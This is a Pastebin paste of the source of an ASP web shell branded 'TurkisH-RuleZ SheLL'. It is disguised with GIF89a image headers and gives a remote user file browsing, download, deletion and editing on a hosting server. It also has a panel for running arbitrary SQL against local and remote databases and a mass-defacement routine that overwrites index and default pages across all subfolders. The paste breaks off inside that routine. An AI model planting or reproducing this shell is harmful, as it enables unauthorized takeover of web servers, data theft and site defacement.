Advertisement
Guest User

Untitled

a guest
Feb 4th, 2016
170
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 142.45 KB | None | 0 0
  1. GIF89a;
  2. GIF89a;
  3. GIF89a;
  4. GIF89a;
  5. <%
  6. 'if request("rootx") = "b0x" then
  7. 'response.cookies("yes") = "1"
  8. 'response.cookies("yes").expires = now+352
  9. 'end if
  10. 'if not request.cookies("yes") = "1" then
  11. 'response.end()
  12. 'end if
  13. Server.ScriptTimeOut = 7200
  14. Fullpath=replace(Request.ServerVariables("PATH_TRANSLATED"),"/","\")
  15. FilePath = mid(Fullpath,InStrRev(Fullpath,"\")+1)
  16. FolderPath = Left(Fullpath,InStrRev(Fullpath,"\"))
  17. const charset="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_-"
  18. const karakter1="ABCDEFGHIJKLMNOPQRSTUVWXYZ"
  19. const karakter2="abcdefghijklmnopqrstuvwxyz"
  20. const karakter3="0123456789"
  21. const karakter4="!@#$%^&*()-_+=~`[]{}|\:;<>,.?/"
  22. mail_array = array("yahoo","hotmail","mynet","gmail","hacker") '?zel mailler yaratmak i?in, SPAM dan ka??rmak i?in. Securityi a?mak i?in by b0x
  23. uzanti_array = array("c3om","n3et","bi3z","or3g","go3v","b3r","in3fo")
  24. yasak_array = array("b0x","CYBERWARRIOR","CYBERSECURITY","GAL","GAL","TURK")
  25. Dim b0x
  26. Set b0x = CreateObject("Scripting.FileSystemObject")
  27. Path = Trim(request("Path"))
  28.  
  29. mode = request("mode")
  30. FolderPath2 = request("FolderPath2")&"\"
  31. islem = request("islem")
  32. del = request("del")
  33. file = request("file")
  34. folder = request("folder")
  35. table = Request("table")
  36. inject1 = Request("inject1")
  37. inject2 = Request("inject2")
  38. inject3 = Request("inject3")
  39. inject4 = Request("inject4")
  40. inject5 = Request("inject5")
  41. cmdkod = Request("cmdkod")
  42. hacked = request("hacked")
  43. Path = request("Path")
  44. url = request("url")
  45. count = request("count")
  46. size = request("size")
  47. dbname = request("dbname")
  48. dbkadi = request("dbkadi")
  49. dbsifre = request("dbsifre")
  50. b0xsql = request("b0xsql")
  51. sec = request("sec")
  52. Usermd5 = request("Usermd5")
  53. ara1 = request("ara1")
  54. ara2 = request("ara2")
  55. k1 = request("k1")
  56. k2 = request("k2")
  57. k3 = request("k3")
  58. k4 = request("k4")
  59. waiting = request("waiting")
  60. coding = request("coding")
  61. dizi = request("dizi")
  62. Usersmd5 = request("Usersmd5")
  63. salt = request("salt")
  64. hash2 = request("hash2")
  65. hash3 = request("hash3")
  66. hash4 = request("hash4")
  67. hash5 = request("hash5")
  68. hash6 = request("hash6")
  69. hash7 = request("hash7")
  70. hash8 = request("hash8")
  71. hash9 = request("hash9")
  72. hash10 = request("hash10")
  73.  
  74. if Path = "" then
  75. Path = FolderPath
  76. else
  77. FolderPath = Path
  78. end if
  79.  
  80. if mode = "1" then
  81. FolderPath = request.form("remote")
  82. Path = request.form("remote")
  83. end if
  84.  
  85. nolist = False
  86. popup = False
  87.  
  88. if mode = "2" or mode = "3" or mode = "7" or mode = "8" or mode = "16" or mode = "17" or mode = "18" or mode = "19" or mode = "20" or mode = "21" or mode = "22" or mode = "24" or mode = "25" or mode = "26" or mode = "27" or mode = "28" or mode = "29" or mode = "30" or mode = "31" or mode = "32" or mode = "33" or mode = "36" or mode = "38" or mode = "39" or mode = "40" or mode = "41" or mode = "42" or mode = "43" or mode = "44" or mode = "45" or mode = "99" then
  89. popup = True
  90. end if
  91.  
  92. if mode = "6" then
  93. Response.Buffer=True
  94. Set Fil = b0x.GetFile(file)
  95. Response.contenttype="application/force-download"
  96. Response.AddHeader "Cache-control","private"
  97. Response.AddHeader "Content-Length", Fil.Size
  98. Response.AddHeader "Content-Disposition", "attachment; filename=" & Fil.name
  99. Response.BinaryWrite readBinaryFile(Fil.path)
  100. Set f = Nothing: Set Fil = Nothing
  101. response.end
  102. end if
  103.  
  104. response.write "<title># TurkisH-RuleZ SheLL </title>"
  105. response.write "<meta http-equiv=""Content-Type"" content=""text/html; charset=iso-8859-9"">"
  106. response.write "<style>"
  107. response.write "body{margin:0px;font-style:normal;font-size:10px;color:#FFFFFF;font-family:Verdana,Arial;background-color:#3a3a3a;scrollbar-face-color: #303030;scrollbar-highlight-color: #5d5d5d;scrollbar-shadow-color: #121212;scrollbar-3dlight-color: #3a3a3a;scrollbar-arrow-color: #9d9d9d;scrollbar-track-color: #3a3a3a;scrollbar-darkshadow-color: #3a3a3a;}"
  108. response.write ".k1{font-family:Wingdings; font-size:15px;}"
  109. response.write ".k2{font-family:Webdings; font-size:15px;}"
  110. response.write "td{font-style:normal;font-size:10px;color:#FFFFFF;font-family:Verdana,Arial;}"
  111. response.write "a{color:#EEEEEE;text-decoration:none;}"
  112. response.write "a:hover{color:#40a0ec;}"
  113. response.write "a:visited{color:#EEEEEE;}"
  114. response.write "a:visited:hover{color:#40a0ec;}"
  115. response.write "input,"
  116. response.write ".kbrtm,"
  117. response.write "select{background:#303030;color:#FFFFFF;font-family:Verdana,Arial;font-size:10px;vertical-align:middle; height:18; border-left:1px solid #5d5d5d; border-right:1px solid #121212; border-bottom:1px solid #121212; border-top:1px solid #5d5d5d;}"
  118. response.write "textarea{background:#121212;color:#FFFFFF;font-family:Verdana,Arial;font-size:10px;vertical-align:middle; height:18; border-left:1px solid #121212; border-right:1px solid #5d5d5d; border-bottom:1px solid #5d5d5d; border-top:1px solid #121212;}"
  119. response.write "</style>"
  120. %>
  121. <script language=javascript>
  122. function NewWindow(mypage, myname, w, h, scroll) {
  123. var winl = (screen.width - w) / 2;
  124. var wint = (screen.height - h) / 2;
  125. winprops = 'height='+h+',width='+w+',top='+wint+',left='+winl+',scrollbars='+scroll+',resizable'
  126. win = window.open(mypage, myname, winprops)
  127. if (parseInt(navigator.appVersion) >= 4) { win.window.focus(); }
  128. }
  129. function klasorkopya(yol){
  130. NewWindow(yol,"",400,130,"no");
  131. }
  132. function mass(yol){
  133. NewWindow(yol,"",555,600,"yes");
  134. }
  135. function tester(yol){
  136. NewWindow(yol,"",600,600,"yes");
  137. }
  138. function klasor(yol){
  139. NewWindow(yol,"",420,450,"yes");
  140. }
  141. function cmd(yol){
  142. NewWindow(yol,"",550,555,"no");
  143. }
  144. function biz(yol){
  145. NewWindow(yol,"",550,700,"no");
  146. }
  147. function cmdhelp(yol){
  148. NewWindow(yol,"",500,230,"no");
  149. }
  150. function somur(yol){
  151. NewWindow(yol,"",420,220,"yes");
  152. }
  153. </script>
  154. <script language="JavaScript">
  155. function openInMainWin(winLocation){
  156. window.opener.location.href = winLocation
  157. window.opener.focus();
  158. }
  159. </script>
  160. <%
  161. sub KlasorOku
  162. on error resume next
  163. Set f = b0x.GetFolder(FolderPath)
  164. Set fc = f.SubFolders
  165. For Each f1 In fc
  166. Response.Write "<table class=""kbrtm"" ><tr><td><font class=""k1""><a title="" Move And Copy ?? "" href='"&FilePath&"?mode=2&Path="&FolderPath&"\"&f1.Name&"&Time="&time&"' onclick=""klasorkopya(this.href);return false;"">4</a></font> <font class=""k1""><a title="" Delete File "" href='"&FilePath&"?mode=4&Path="&FolderPath&"&del="&FolderPath&"\"&f1.Name&"&Time="&time&"'>?</a> 1</font><font size=2><b><a title="" Dizinin i?ine Gir "" href='"&FilePath&"?Path="&FolderPath&"\"&f1.Name&"&Time="&time&"'>"&f1.name&"</a></b></td></tr></table>"
  167. Response.Flush
  168. Next
  169. call Status
  170. end sub
  171.  
  172. sub DosyaOku
  173. on error resume next
  174. Set f = b0x.GetFolder(FolderPath)
  175. Set fc = f.Files
  176. For Each f1 In fc
  177. dosyaAdi = f1.name
  178. num = InStrRev(dosyaAdi,".")
  179. uzanti = lcase(Right(dosyaAdi,len(dosyaAdi)-num))
  180. downStr = "<a title=""Delete File"" href='"&FilePath&"?mode=5&Path="&FolderPath&"&del="&FolderPath&"\"&f1.Name&"&Time="&time&"'>?</a><font face=webdings><a title="" Download File "" href='"&FilePath&"?mode=6&file="&f1.path&"&Path="&FolderPath&"&Time="&time&"'>?</a></font><font face=wingdings><a title="" Copy/Move File?? "" href='"&FilePath&"?mode=7&file="&f1.path&"&Time="&time&"' onclick=""klasorkopya(this.href);return false;"">4</a><a title="" Rename File "" href='"&FilePath&"?mode=16&file="&f1.path&"&islem="&f1.name&"&Path="&FolderPath&"&Time="&time&"' onclick=""klasorkopya(this.href);return false;"">?</a></font>"
  181. response.Write "<table class=""kbrtm"" ><tr><td><font size=2>"
  182. select case uzanti
  183. case "mdb"
  184. Response.Write "<a title="" Db in i?ini G?rmek , SQl sorgu yapmak i?in T?kla Developed By TurkisH-RuleZ "" href='"&FilePath&"?mode=13&file="&FolderPath&"\"&f1.Name&"&Path="&FolderPath&"&Time="&time&"'>"&f1.name&" [<font color=yellow>"&FormatNumber(f1.size,0)&"</font>]"&"</a></b> <font face=wingdings size=4>M "&downStr&"</font></td></tr></table>"
  185. case "asp"
  186. Response.Write "<a title="" ??ini Gomek i?in T?kla "" href='"&FilePath&"?mode=9&file="&FolderPath&"\"&f1.Name&"&Path="&FolderPath&"&Time="&time&"'>"&f1.name&" [<font color=yellow>"&FormatNumber(f1.size,0)&"</font>]"&"</a></b> <font face=wingdings size=4>?± <a title="" Edit File "" href='"&FilePath&"?mode=10&file="&f1.path&"&Time="&time&"&Path="&FolderPath&"'>!</a>"&downStr&"</font></td></tr></table>"
  187. case "jpg","gif"
  188. Response.Write "<a title="" Resmi G?rmek i?in T?kla "" href='"&FilePath&"?mode=12&file="&FolderPath&"\"&f1.Name&"&Path="&FolderPath&"&Time="&time&"'>"&f1.name&" [<font color=yellow>"&FormatNumber(f1.size,0)&"</font>]"&"</a></b> <font face=webdings size=4>?¢</font><font face=wingdings size=4> "&downStr&"</font></td></tr></table>"
  189. case else
  190. Response.Write "<a title="" ??ini Gomek i?in T?kla "" href='"&FilePath&"?mode=9&file="&FolderPath&"\"&f1.Name&"&Path="&FolderPath&"&Time="&time&"'>"&f1.name&" [<font color=yellow>"&FormatNumber(f1.size,0)&"</font>]"&"</a></b> <font face=wingdings size=4>2 <a title="" Edit File "" href='"&dosyaPath&"?mode=10&file="&f1.path&"&Time="&time&"&Path="&FolderPath&"'>!</a>"&downStr&"</font></td></tr></table>"
  191. end select
  192. Next
  193. call Status
  194. end sub
  195.  
  196. sub Suruculer
  197. for each drive_ in b0x.Drives
  198. Response.Write "<tr bgcolor=""#3a3a3a""><td height=""20"" class=""kbrtm"">"
  199. Response.Write "<a href="" "&FilePath&"?Path="&drive_.DriveLetter&":/ "">"
  200. if drive_.Drivetype=1 then Response.write "&nbsp;&nbsp;<font class=""k1""><</font>&nbsp;Disk Drive [" & drive_.DriveLetter & ":]&nbsp;&nbsp;&nbsp;<a title=""S?r?c? Detay? ??in T?kla"" href="""&FilePath&"?dspace="&drive_.DriveLetter&"&Path="&Path&"""><font class=""k1"">?</font></a>"
  201. if drive_.Drivetype=2 then Response.write "&nbsp;&nbsp;<font class=""k1"">;</font>&nbsp;Disk Drive [" & drive_.DriveLetter & ":]&nbsp;&nbsp;&nbsp;<a title=""S?r?c? Detay? ??in T?kla"" href="""&FilePath&"?dspace="&drive_.DriveLetter&"&Path="&Path&"""><font class=""k1"">?</font></a>"
  202. if drive_.Drivetype=3 then Response.write "&nbsp;&nbsp;<font class=""k1"">;</font>&nbsp;C?kar?labilir Disk [" & drive_.DriveLetter & ":]&nbsp;&nbsp;&nbsp;<a title=""S?r?c? Detay? ??in T?kla"" href="""&FilePath&"?dspace="&drive_.DriveLetter&"&Path="&Path&"""><font class=""k1"">?</font></a>"
  203. if drive_.Drivetype=4 then Response.write "&nbsp;&nbsp;<font class=""k2"">?³</font>&nbsp;Cd-Rom [" & drive_.DriveLetter & ":]&nbsp;&nbsp;&nbsp;<a title=""S?r?c? Detay? ??in T?kla"" href="""&FilePath&"?dspace="&drive_.DriveLetter&"&Path="&Path&"""><font class=""k1"">?</font></a>"
  204. Response.Write "</a></td></tr>"
  205. next
  206. Response.Write "<tr bgcolor=""#3a3a3a""><td class=""kbrtm"" height=""20"">&nbsp;&nbsp;<a href="" "&FilePath&" ""><font class=""k2"">H</font> Local Path </a></td></tr>"
  207. end sub
  208.  
  209. Sub SurucuInfo
  210. 'Disk Alan?n? G?sterir - Coded Developed By TurkisH-RuleZ
  211.  
  212. DriveSpace = Request("dspace")
  213. If Not DriveSpace = "" Then
  214. on error resume next
  215. Set driveObject = b0x.GetDrive(DriveSpace)
  216. D1 = Left((driveObject.FreeSpace/(driveObject.TotalSize*1.0))*100.0, 4)
  217. if err <> 0 then
  218. response.write "<center><br> <font color=#FE7A84> <font face=Wingdings size=5>N</font> Disk Haz?r de?il !!!! :( <font face=Wingdings size=5>N</font></font> <br></center>"
  219. else
  220. D2 = Left(((driveObject.TotalSize - driveObject.FreeSpace)/(driveObject.TotalSize*1.0))*100.0, 4)
  221. D3 = 100
  222. D1a = 110 - D1
  223. D2a = 110 - D2
  224. D3a = 110 - D3
  225. Response.Write "<br><center><table cellspacing=0 cellpadding=0><tr><td style='background-color: #121212;' colspan=4 align=center class=kbrtm><b>Disk :</b>&nbsp;" & driveObject.DriveLetter & "</td></tr><tr><td class=kbrtm width=60>&nbsp;</td><td class=kbrtm width=100 align=center><b>Bo? Alan</b></td><td class=kbrtm width=100 align=center><b>Kullan?lan Alan</b></td><td class=kbrtm width=100 align=center><b>Toplam Alan</b></td></tr><tr><td height=110 class=kbrtm>&nbsp;</td><td class=kbrtm align=center><table cellpadding=0 cellspacing=0><tr><td colspan=3 height="&D1a&"></td></tr><tr height="&D1&"><td bgcolor=#009900 width=2></td><td bgcolor=#33CC00 width=15></td><td bgcolor=#009900 width=2></td></tr></table></td><td class=kbrtm align=center valign=bottom><table cellpadding=0 cellspacing=0><tr><td colspan=3 height="&D2a&"></td></tr><tr height="&D2&"><td bgcolor=#990000 width=2></td><td bgcolor=#CC0000 width=15></td><td bgcolor=#990000 width=2></td></tr></table></td><td class=kbrtm align=center valign=bottom><table cellpadding=0 cellspacing=0><tr><td colspan=3 height="&D3a&"></td></tr><tr height="&D3&"><td bgcolor=#006699 width=2></td><td bgcolor=#0088CC width=15></td><td bgcolor=#006699 width=2></td></tr></table></td></tr><tr><td class=kbrtm>&nbsp;<b>Y?zde :</b></td><td class=kbrtm align=center>"&D1&" %</td><td class=kbrtm align=center>"&D2&" %</td><td class=kbrtm align=center>"&D3&" %</td></tr><tr><td class=kbrtm>&nbsp;<b>Boyut :</b></td><td class=kbrtm align=center>&nbsp;" & FormatNumber(driveObject.FreeSpace / 1048576) & " MB</td><td class=kbrtm align=center>&nbsp;" & FormatNumber(driveObject.TotalSize / 1048576) - FormatNumber(driveObject.FreeSpace / 1048576) & " MB</td><td class=kbrtm align=center>&nbsp;" & FormatNumber(driveObject.TotalSize / 1048576) & " MB</td></tr></table></center><br><br><br>"
  226. end if
  227. Set driveObject = Nothing
  228. End If
  229. end sub
  230.  
  231. sub yetkino(str)
  232. response.write "<td class=""kbrtm"">&nbsp;&nbsp;&nbsp;<b><font color=#FBE1D7>"&str&" :</font></b> <font color=#FE7A84 class=""k1"">?</font>&nbsp;&nbsp;&nbsp;</td>"
  233. End Sub
  234. sub yetkiyes(str)
  235. response.write "<td class=""kbrtm"">&nbsp;&nbsp;&nbsp;<b><font color=#FAFEDE>"&str&" :</font></b> <font color=#C6FCBE class=""k1"">?</font>&nbsp;&nbsp;&nbsp;</td>"
  236. end Sub
  237.  
  238. sub Yetki
  239. on error resume next
  240. Set f = b0x.GetFolder(FolderPath)
  241. if err<>0 then
  242. yetkino("Reading ")
  243. yetkino("Writing ")
  244. yetkino("Deleting ")
  245. else
  246. yetkiyes("Reading ")
  247.  
  248. on error resume next
  249. Set MyFile = b0x.CreateTextFile(FolderPath & "test.b0x", True)
  250. MyFile.write "b0x Was Here... =) Writing - Reading Testi i?in"
  251. set MyFile = Nothing
  252. if err<>0 then
  253. yetkino("Writing ")
  254. yetkino("Deleting ")
  255. else
  256. yetkiyes("Writing ")
  257. on error resume next
  258. b0x.DeleteFile FolderPath & "test.b0x",true
  259. if err<>0 then
  260. yetkino("Deleting ")
  261. else
  262. yetkiyes("Deleting ")
  263. end if
  264. end if
  265.  
  266. end if
  267. set f = nothing
  268. end sub
  269.  
  270. Sub olmadi(str)
  271. response.write "<br><center><font color=#FE7A84> <font face=Wingdings size=5>N</font> "&str&" :( <font face=Wingdings size=5>N</font> </font></center>"
  272. End Sub
  273.  
  274. Sub oldu(str)
  275. response.write "<br><center><font color=#C6FCBE> <font face=Wingdings size=5>N</font> "&str&" ;) Tebrikler ??lem Ba?ar?yla Ger?ekle?tirildi.. by b0x <font face=Wingdings size=5>N</font> </font></center>"
  276. End Sub
  277.  
  278. Sub tablo12(str)
  279. response.write "<tr bgcolor=""#121212""><td align=""center"" width=""100%"" valign=""middle"">"&str&"</td></tr>"
  280. End Sub
  281.  
  282. Sub tablo30(str)
  283. response.write "<tr bgcolor=""#303030""><td class=""kbrtm"" align=""center"" width=""100%"" valign=""middle"">"&str&"</td></tr>"
  284. End Sub
  285.  
  286. Sub tablo12L(str)
  287. response.write "<tr bgcolor=""#121212""><td align=""center"" width=""100%"" valign=""middle"">"&str&"</td></tr>"
  288. End Sub
  289.  
  290. Sub tablo12O(str)
  291. response.write "<tr bgcolor=""#121212""><td class=""kbrtm"" align=""center"" width=""100%"" valign=""middle"">"&str&"</td></tr>"
  292. End Sub
  293.  
  294. sub Status
  295. if err<>0 then
  296. Response.Write "<center><font color=red size=2>Status : "&err.Description&"</font></center>"
  297. end if
  298. end sub
  299.  
  300. Function ReadBinaryFile(FileName)
  301. Const adTypeBinary = 1
  302. Dim BinaryStream
  303. Set BinaryStream = CreateObject("ADODB.Stream")
  304. BinaryStream.Type = adTypeBinary
  305. BinaryStream.Open
  306. BinaryStream.LoadFromFile FileName
  307. ReadBinaryFile = BinaryStream.Read
  308. End Function
  309.  
  310. Sub SQL_menu_by_b0x
  311. response.write "<center><table width=""450"">"
  312. response.write "<tr class=""kbrtm"" valign=""top""><td colspan=""2"" align=""center"">"
  313. response.write "<form name=""dosyacopypaste"" action='"&FilePath&"' type=""post"">"
  314. response.write "<table class=""kbrtm"" cellpadding=""1"" cellspacing=""1"" bgcolor=""#5d5d5d"" width=""100%"">"
  315. tablo30(" <b>SQL ?njection Merkezi</b>")
  316. tablo30("&nbsp;")
  317. tablo12("<font color=#FE7A84> Kullanabilmeniz i?in SQL kou?tlar? bilmeniz gerek !!! <br> <font face=Wingdings size=5>N</font> Aksi Halde ASP DOsya? Kitlenir. Cevap veremez. Server a Zarar verir. <font face=Wingdings size=5>N</font></font>")
  318. tablo12(" Select <input value=""select"" type=""radio"" name=""islem"" checked> <input size=""60"" type=""text"" name=""inject1"" value='Select * from "&table&"'>")
  319. tablo12(" Delete <input value=""delete"" type=""radio"" name=""islem"" > <input size=""60"" type=""text"" name=""inject2"" value='Delete from "&table&"'>")
  320. tablo12(" Insert <input value=""insert"" type=""radio"" name=""islem"" > <input size=""60"" type=""text"" name=""inject3"" value='Insert into "&table&" () values ()'>")
  321. tablo12(" Update <input value=""update"" type=""radio"" name=""islem"" > <input size=""60"" type=""text"" name=""inject4"" value='Update "&table&" set .. where ..'>")
  322. tablo12(" Di?er <input value=""diger"" type=""radio"" name=""islem"" > <input size=""60"" type=""text"" name=""inject5"" value='Drop "&table&"'>")
  323. tablo12("<input name=""mode"" type=""hidden"" value='15' ><input name=""sec"" type=""hidden"" value='"&sec&"' ><input name=""b0xsql"" type=""hidden"" value='"&b0xsql&"' ><input name=""file"" type=""hidden"" value='"&file&"' ><input name=""Path"" type=""hidden"" value='"&FolderPath&"' ><input name=""table"" type=""hidden"" value='"&table&"' ><br><input value="" SQL ?nj. Uygula "" type=""Submit""><br><br>")
  324. if b0xsql = "" then
  325. tablo12("<a href='"&FilePath&"?mode=13&file="&file&"&Path="&FolderPath&"&Time="&time&"'> .... ::: Tablolara Geri D?n ::: .... </a><br>")
  326. else
  327. tablo12("<a href='"&FilePath&"?mode=34&file="&file&"&Path="&Path&"&b0xsql="&b0xsql&"&islem=1&Time="&time&"'> .... ::: Tablolara Geri D?n ::: .... </a><br>")
  328. end if
  329. response.write "</form></table></td></tr></table><br></center>"
  330. response.write "<table align=""center"" class=""kbrtm""><tr><td align='center'> <a href='"&FilePath&"?mode=36&Path="&Path&"&Time="&time&"' onclick=""klasor(this.href);return false;""><b>...:::::: SQL Komut Yard?m - Kullan?m Klavuzu by b0x ::::::...</b></a> </td></tr></table><br>"
  331. end sub
  332.  
  333. Sub SQL_by_b0x(sqlPath,sqlkomut)
  334. on error resume next
  335. Set objConn = Server.CreateObject("ADODB.Connection")
  336. Set objRcs = Server.CreateObject("ADODB.RecordSet")
  337. objConn.Provider = "Microsoft.Jet.Oledb.4.0"
  338. objConn.ConnectionString = sqlPath
  339. objConn.Open
  340. if err <> 0 then
  341. response.write "<br><br><center> <font color=#FE7A84> <font face=Wingdings size=5>N</font> DataBase ile Ba?lant?n?z Sa?lanamad? !!! by b0x :( <font color=#FE7A84> <font face=Wingdings size=5>N</font> </font> </center><br><br>"
  342. else
  343. on error resume next
  344. objRcs.Open sqlkomut,objConn, adOpenKeyset , , adCmdText
  345. if err <> 0 then
  346. response.write "<br><br><center> <font color=#FE7A84> <font face=Wingdings size=5>N</font> SQL ?njection Komutunuzda Status var. ( Bilmiyorsan KullanMA :) ) by b0x <font color=#FE7A84> <font face=Wingdings size=5>N</font> </font> </center><br><br>"
  347. else
  348. Response.Write "<center><table class=""kbrtm"" border=1 cellpadding=2 cellspacing=0 bordercolor=543152><tr bgcolor=silver>"
  349. for i=0 to objRcs.Fields.count-1
  350. Response.Write "<td><font color=black><b>&nbsp;&nbsp;&nbsp;"&objRcs.Fields(i).Name&"&nbsp;&nbsp;&nbsp;</font></td>"
  351. next
  352. Response.Write "</tr>"
  353. do while not objRcs.EOF
  354. Response.Write "<tr class=""kbrtm"">"
  355. for i=0 to objRcs.Fields.count-1
  356. Response.Write "<td class=""kbrtm"">"&Replace(objRcs.Fields(i).Value,"<","&lt;")&"&nbsp;</td>"
  357. next
  358. Response.Write "</tr>"
  359. objRcs.MoveNext
  360. loop
  361. Response.Write "</table><br></center>"
  362. end if
  363. end if
  364. end sub
  365.  
  366. Sub MSSQL_by_b0x(sqlPath,sqlkomut)
  367. on error resume next
  368. Set objConn = Server.CreateObject("ADODB.Connection")
  369. Set objRcs = Server.CreateObject("ADODB.RecordSet")
  370. objConn.Open sqlPath
  371. if err <> 0 then
  372. response.write "<br><br><center> <font color=#FE7A84> <font face=Wingdings size=5>N</font> DataBase ile Ba?lant?n?z Sa?lanamad?? !!! by b0x :( <font color=#FE7A84> <font face=Wingdings size=5>N</font> </font> </center><br><br>"
  373. else
  374. on error resume next
  375. objRcs.Open sqlkomut,objConn, adOpenKeyset , , adCmdText
  376. if err <> 0 then
  377. response.write "<br><br><center> <font color=#FE7A84> <font face=Wingdings size=5>N</font> SQL ?njection Komutunuzda Status var. ( Bilmiyorsan KullanMA :) ) by b0x <font color=#FE7A84> <font face=Wingdings size=5>N</font> </font> </center><br><br>"
  378. else
  379. Response.Write "<center><table class=""kbrtm"" border=1 cellpadding=2 cellspacing=0 bordercolor=543152><tr bgcolor=silver>"
  380. for i=0 to objRcs.Fields.count-1
  381. Response.Write "<td><font color=black><b>&nbsp;&nbsp;&nbsp;"&objRcs.Fields(i).Name&"&nbsp;&nbsp;&nbsp;</font></td>"
  382. next
  383. Response.Write "</tr>"
  384. do while not objRcs.EOF
  385. Response.Write "<tr class=""kbrtm"">"
  386. for i=0 to objRcs.Fields.count-1
  387. Response.Write "<td class=""kbrtm"">"&objRcs.Fields(i).Value&"&nbsp;</td>"
  388. next
  389. Response.Write "</tr>"
  390. objRcs.MoveNext
  391. loop
  392. Response.Write "</table><br></center>"
  393. end if
  394. end if
  395. end sub
  396.  
  397. sub Tablolama()
  398. on error resume next
  399. if b0xsql = "" then
  400. if sec = "mssql" then
  401. b0xsql = "PROVIDER=SQLOLEDB;DATA SOURCE="&file&";UID="&dbkadi&";PWD="&dbsifre&";DATABASE="&dbname&""
  402. else
  403. b0xsql = "Driver={MySQL ODBC 3.51 Driver};Server="&file&";Database="&dbname&";Uid="&dbkadi&";Pwd="&dbsifre&""
  404. end if
  405. end if
  406. Set objConn = Server.CreateObject("ADODB.Connection")
  407. Set objADOX = Server.CreateObject("ADOX.Catalog")
  408. objConn.Open b0xsql
  409. objADOX.ActiveConnection = objConn
  410. if err = 0 then
  411. Response.Write "<center><b><font size=3>Tablolar</font></br><br>"
  412. response.write "<table class=""kbrtm"">"
  413. For Each table in objADOX.Tables
  414. If table.Type = "TABLE" Then
  415. Response.Write "<tr><td><font face=wingdings size=5>4</font> <a href='"&FilePath&"?mode=35&b0xsql="&b0xsql&"&table="&table.Name&"&Path="&Path&"&time="&time&"'>"&table.Name&"</a></td></tr>"
  416. End If
  417. Next
  418. response.write "</table>"
  419. response.write "</center>"
  420. else
  421. Call MSSQL_Form
  422. yazortaa("<br><br><center> <font color=#FE7A84> <font face=Wingdings size=5>N</font> Server ile ba?lant? Sa?lanamad? !!! girilen De?erler yanl?? .. :( by b0x <font face=Wingdings size=5>N</font> </font><br><br></center>")
  423. end if
  424. end Sub
  425.  
  426. sub MSSQL_Form()
  427. response.write "<center><table align=""center"" ><tr><td>"
  428. yazorta("<b> MY-MS SQL Server Connection 2.0 by b0x </b>")
  429. response.write "<table align=""center"" width=""100%"" class=""kbrtm""><tr><td align='center'><form name=""MssqlbyE_j_d?er"" method='post' action='"&FilePath&"?mode=34&Path="&Path&"&Time="&time&"'><input name='sec' checked value='mssql' type='radio'> <b>MsSQL</b> &nbsp;&nbsp; - &nbsp;&nbsp; <input name='sec' value='mysql' type='radio'> <b>MySQL</b></td></tr><tr><td>Server IP/Hostname : <input name='file' value='"&file&"' style='color=#C6FCBE' size=35 type='text'></td></tr><tr><td> DB Ad? : <input name='dbname' style='color=#C6FCBE' type='text' value='"&dbname&"' size=44></td></tr><tr><td> KAd? : <input name='dbkadi' style='color=#C6FCBE' value='"&dbkadi&"' type='text' size=46></td></tr><tr><td> ?ifre : <input name='dbsifre' style='color=#C6FCBE' type='text' value='"&dbsifre&"' size=46></td></tr><td align='center'> <input name='islem' type='hidden' value='1'><input name='gooo' value=' ..:: Ba?lan ::..' type='Submit'></td></tr></form></table>"
  430. yazorta("TUm haklar? Sakl?d?r by b0x =)")
  431. response.write "</td></tr></table></center>"
  432. end sub
  433.  
  434. sub MassCopier(hedef)
  435. on error resume next
  436. Set cloner = b0x.GetFile(hacked)
  437. cloner.Copy hedef,true
  438. Set cloner = Nothing
  439. end sub
  440.  
  441. sub MassCreater(yer,savsak)
  442. on error resume next
  443. Set savsakcom = b0x.CreateTextFile(yer, True)
  444. savsakcom.write savsak
  445. Set savsakcom = Nothing
  446. end sub
  447.  
  448. sub MassAttack2(yer,ej,svk)
  449. if hash3 = "ok" then
  450. yer = yer&"\"&svk
  451. end if
  452. on error resume next
  453. if not islem = "ozel" then
  454. if hash9 = "copy" then
  455. MassCopier(yer&"\index.html")
  456. MassCopier(yer&"\index.htm")
  457. MassCopier(yer&"\index.asp")
  458. MassCopier(yer&"\index.cfm")
  459. MassCopier(yer&"\index.php")
  460. MassCopier(yer&"\default.html")
  461. MassCopier(yer&"\default.htm")
  462. MassCopier(yer&"\default.asp")
  463. MassCopier(yer&"\default.cfm")
  464. MassCopier(yer&"\default.php")
  465. else
  466. Call MassCreater(yer&"\index.html",ej)
  467. Call MassCreater(yer&"\index.htm",ej)
  468. Call MassCreater(yer&"\index.asp",ej)
  469. Call MassCreater(yer&"\index.cfm",ej)
  470. Call MassCreater(yer&"\index.php",ej)
  471. Call MassCreater(yer&"\default.html",ej)
  472. Call MassCreater(yer&"\default.htm",ej)
  473. Call MassCreater(yer&"\default.asp",ej)
  474. Call MassCreater(yer&"\default.cfm",ej)
  475. Call MassCreater(yer&"\default.php",ej)
  476. end if
  477. else
  478. if hash9 ="copy" then
  479. MassCopier(yer&"\"&inject1)
  480. else
  481. Call MassCreater(yer&"\"&inject1,ej)
  482. end if
  483. end if
  484.  
  485. a = Replace(FilePath&"?Path="&yer&"&Time="&time,"\","/")
  486. If Err.Number = 0 Then
  487. response.write "<table width=""100%""><tr><td class=""kbrtm""><a href=# onClick=""openInMainWin('"&a&"');""> "&yer&" </a><font color=#C6FCBE> OK !! <font class=""k1"">?</font></td></tr></table>"
  488. else
  489. response.write "<table width=""100%""><tr><td class=""kbrtm""><a href=# onClick=""openInMainWin('"&a&"');""> "&yer&" </a><font color=#FE7A84> Noo :( !! <font class=""k1"">?</font></td></tr></table>"
  490. end if
  491. Err.Number = 0
  492. Response.Flush
  493. end sub
  494.  
  495. sub MassAttack(yer,ej,svk)
  496. dim fastb0x
  497. on error resume next
  498. Set f = b0x.GetFolder(yer)
  499. Set fc = f.SubFolders
  500. For Each f1 In fc
  501.  
  502. if hash3 = "ok" then
  503. fastb0x = f1.path&"\"&svk
  504. else
  505. fastb0x = f1.path
  506. end if
  507.  
  508. if not islem = "ozel" then
  509. if hash9 = "copy" then
  510. MassCopier(fastb0x&"\index.html")
  511. MassCopier(fastb0x&"\index.htm")
  512. MassCopier(fastb0x&"\index.asp")
  513. MassCopier(fastb0x&"\index.cfm")
  514. MassCopier(fastb0x&"\index.php")
  515. MassCopier(fastb0x&"\default.html")
  516. MassCopier(fastb0x&"\default.htm")
  517. MassCopier(fastb0x&"\default.asp")
  518. MassCopier(fastb0x&"\default.cfm")
  519. MassCopier(fastb0x&"\default.php")
  520. else
  521. Call MassCreater(fastb0x&"\index.html",ej)
